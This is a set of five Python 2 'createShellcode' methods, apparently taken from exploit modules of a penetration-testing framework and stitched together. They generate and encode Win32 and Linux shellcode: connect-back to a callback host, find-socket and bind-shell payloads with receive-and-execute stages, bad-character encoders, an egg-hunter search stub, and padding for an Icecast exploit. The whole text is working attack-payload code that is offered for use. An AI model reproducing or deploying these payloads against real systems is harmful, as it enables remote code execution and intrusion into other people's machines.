def createShellcode(self):
sc = shellcodeGenerator.win32()
#sc.addAttr("revert_to_self_before_importing_ws2_32",None)
sc.addAttr("unhandled_exception_filter", None)
#sc.addAttr("debugme", None)
sc.addAttr("GOFindSock", None)
sc.addAttr("RecvExecWin32", None)
#sc.addAttr("LoadRegAsFD", {"reg" : "esi"})
#sc.addAttr("tcpconnect",{"port":localport,"ipaddress":localhost})
#sc.addAttr("initstackswap",None)
#sc.addAttr("stackSwap",None)
raw = sc.get()
encoder = chunkedaddencoder.intelchunkedaddencoder()
encoder.setbadstring(self.badstring)
#tag it for the searcher
self.shellcode = "AAAAAAAA\xeb\x08" + self.tag2 + self.tag1 + encoder.encode(
raw)
#now do search shellcode
raw = win32shell.getsearchcode(self.tag1, self.tag2)
self.log("Doing printable encoding - takes some time...")
encoder = printable.intelprintableencoder()
encoder.setESPMod(
3700) #put this large enough that esp points at least 200
#bytes below your shellcode
encoder.setbadchars(self.searchbadstring)
data = encoder.encode(raw)
self.encodedsearchcode = data
#print "%d: length=%d (from %d) Data=%s"%(isprint(data),len(data),len(raw),data)
self.log("Done with printable encoding")
return
def createShellcode(self):
#localhost=self.callback.ip
#localport=self.callback.port
sc = shellcodeGenerator.win32()
#sc.addAttr("ForkLoad", None)
# the to fork code
sc.addAttr("findeipnoesp",
{"subespval": self.subesp}) #don't mess with eip
sc.addAttr("isapiGOFindSock", None)
sc.addAttr("ExitThread", None)
#set up the shellcode
self.shellcode = sc.get()
self.log("Size of raw shellcode is %d" % len(self.shellcode))
encoder = chunkedaddencoder.intelchunkedaddencoder()
#these are the characters not allowed by the exploit
encoder.setbadstring(self.badstring)
self.log(
"Encoding shellcode. This may take a while if we don't find a good value in the cache."
)
shellcode = encoder.encode(self.shellcode)
self.log("Done encoding shellcode.")
if shellcode == "":
self.log("Could not encode shellcode")
return 0
#debug int
#shellcode="\xcc"+shellcode
self.setShellcode(shellcode)
self.log("Size of encoded shellcode is %d" % len(self.shellcode))
return 1
def createShellcode(self):
localhost = self.callback.ip
localport = self.callback.port
if self.version == 0:
self.localhost = localhost
self.localport = localport
return ""
if self.versions[self.version][0].count("Windows"):
sc = shellcodeGenerator.win32()
#sc.addAttr("ForkLoad", None)
# the to fork code
#sc.addAttr("revert_to_self_before_importing_ws2_32", None)
#sc.addAttr("unhandled_exception_filter",None)
self.log("Generating shellcode with port %s and ip %s" %
(localport, localhost))
sc.addAttr("tcpconnect", {
"port": localport,
"ipaddress": localhost
})
sc.addAttr("RecvExecWin32", {"socketreg": "FDSPOT"}) #MOSDEF
self.shellcode = sc.get()
self.log("Raw win32 shellcode length: %d" % len(self.shellcode))
#return self.createWin32Shellcode(self.badstring,localhost,localport)
elif self.versions[self.version][0].count("Linux"):
#self.shellcode="\xcc"*500
myshellcode = shellcodeGenerator.linux_X86()
if localport == 0:
self.log("Why is port zero?")
return ""
myshellcode.addAttr("connect", {
"ipaddress": localhost,
"port": localport
})
myshellcode.addAttr("read_and_exec", {"fdreg": "esi"})
self.shellcode = myshellcode.get()
else:
self.log("Cannot yet create shellcode for version %d" %
self.version)
return ""
encoder = chunkedaddencoder.intelchunkedaddencoder()
encoder.setbadstring(self.badstring)
self.log("Encoding shellcode")
self.shellcode = encoder.encode(self.shellcode)
#self.shellcode = "\xcc"+self.shellcode
if self.shellcode == "":
self.log("Problem encoding shellcode")
return 0
self.log("Shellcode length: %d" % len(self.shellcode))
if len(self.shellcode) > 1020:
self.log(
"Warning shellcode is %d bytes - longer than the 1020 available..."
% (len(self.shellcode)))
return self.shellcode
def createShellcode(self):
host = self.callback.ip
port = self.callback.port
self.remoteport = port
sc = shellcodeGenerator.win32()
sc.addAttr("tcpconnect", {"port": port, "ipaddress": host})
sc.addAttr("RecvExecWin32", {"socketreg": "FDSPOT"}) #MOSDEF
#sc.addAttr("initstackswap", None)
#sc.addAttr("stackSwap", None)
self.shellcode = sc.get()
encoder = chunkedaddencoder.intelchunkedaddencoder()
encoder.setbadstring(self.badstring)
self.log("Encoding shellcode")
self.shellcode = encoder.encode(self.shellcode)
if self.shellcode == "":
self.log("Problem encoding shellcode")
return 0
return self.shellcode
def createShellcode(self):
# if -l -d is set, switch to bind mode !!!
sc = shellcodeGenerator.win32()
if self.callback and self.callback.ip == "0.0.0.0": # switching to BindMosdef mode
sc.foundeip = 1
# Icecast specific
sc.addAttr("CreateThreadFindeip", None)
sc.addAttr("revert_to_self_before_importing_ws2_32", None)
# end of Icecast specific
sc.addAttr("BindMosdef", {"port": self.callback.port})
sc.addAttr("RecvExecWin32", {"socketreg": "FDSPOT"})
else:
sc.foundeip = 1
sc.addAttr("CreateThreadFindeip", None)
sc.addAttr("revert_to_self_before_importing_ws2_32", None)
sc.addAttr("GOFindSock", None)
sc.addAttr("RecvExecWin32", None)
self.shellcode = sc.get()
if len(self.shellcode) < 824:
self.shellcode = "A" * (824 - len(self.shellcode)) + self.shellcode
print "[!] size: %d" % len(self.shellcode)
encoder = chunkedaddencoder.intelchunkedaddencoder()
encoder.setbadstring(self.badstring)
self.log("Encoding shellcode")
self.shellcode = encoder.encode(self.shellcode)
if self.shellcode == "":
self.log("Problem encoding shellcode")
return 0
return self.shellcode